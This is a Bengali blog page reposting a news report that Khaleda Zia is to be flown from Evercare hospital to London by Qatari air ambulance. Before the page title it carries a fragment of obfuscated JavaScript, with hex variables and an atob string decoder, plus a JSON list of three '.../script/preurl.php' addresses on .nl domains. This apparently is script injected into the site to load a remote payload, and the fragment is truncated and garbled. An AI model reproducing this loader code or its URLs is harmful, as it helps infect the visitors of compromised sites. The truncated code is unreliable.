/*>(-0x2*o&0x6)):0x0){q=i['indexOf'](q);}return n;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t/* */ { "urls": [ "chaintopdom.nl/script/preurl.php", "smarttopchain.nl/script/preurl.php", "topblockchainsolutions.nl/script/preurl.php" ] } ভোরে খালেদা জিয়াকে লন্ডনে নেওয়া হবে - bd5.blogspot.com

Header Ads ADCASH

ভোরে খালেদা জিয়াকে লন্ডনে নেওয়া হবে

 

বিএনপির চেয়ারপারসন খালেদা জিয়া। ছবি: তারেক রহমানের ফেসবুক পেজ থেকে নেওয়া



ভোরে খালেদা জিয়াকে লন্ডনে নেওয়া হবে

Copied from: https://rtvonline.com/


এভারকেয়ার হাসপাতালের সিসিইউতে চিকিৎসাধীন বিএনপি চেয়ারপারসন বেগম খালেদা জিয়াকে উন্নত চিকিৎসার উদ্দেশে ভোর ৪টা থেকে ৬টার মধ্যে লন্ডনে নেওয়ার প্রস্তুতি চলছে।

বৃহস্পতিবার (৪ ডিসেম্বর) বিএনপির একটি নির্ভরযোগ্য সূত্র এ তথ্য নিশ্চিত করেছে।

অন্যদিকে, দলের মহাসচিব মির্জা ফখরুল ইসলাম আলমগীর দলীয় চেয়ারপারসনের কার্যালয়ে অনুষ্ঠিত ব্রিফিংয়ে জানান, ভোরের দিকে বেগম জিয়াকে লন্ডনে স্থানান্তর করা হবে।

এর আগে দুপুরে রাজধানীর এভারকেয়ার হাসপাতালে সাংবাদিকদের সামনে ব্যক্তিগত চিকিৎসক ও বিএনপির স্থায়ী কমিটির সদস্য ডা. এ জেড এম জাহিদ হোসেন বলেন, দেশি-বিদেশি বিশেষজ্ঞদের সমন্বয়ে গঠিত মেডিকেল বোর্ডের সর্বসম্মত মত অনুযায়ী কাতার এয়ারওয়েজের মাধ্যমে আজ রাতেই বা আগামীকাল সকালেই তাকে লন্ডনে নেওয়া হবে।

তিনি আরও জানান, বিএনপি চেয়ারপারসনের সঙ্গে তার ব্যক্তিগত চিকিৎসকসহ মোট ১৫ জন যুক্তরাজ্যে যাবেন। তাদের মধ্যেই রয়েছেন চিকিৎসা সহায়তায় যুক্ত হওয়া বিশেষজ্ঞ দলের প্রধান ডা. রিচার্ড বিলিও।

ঢাকাস্থ কাতার দূতাবাস জানিয়েছে, বেগম খালেদা জিয়াকে বিদেশে নেওয়ার জন্য দেশটির আমিরের বিশেষ বিমান—কাতারের এয়ার অ্যাম্বুলেন্স—আগের মতোই প্রস্তুত রয়েছে।


No comments

Theme images by suprun. Powered by Blogger.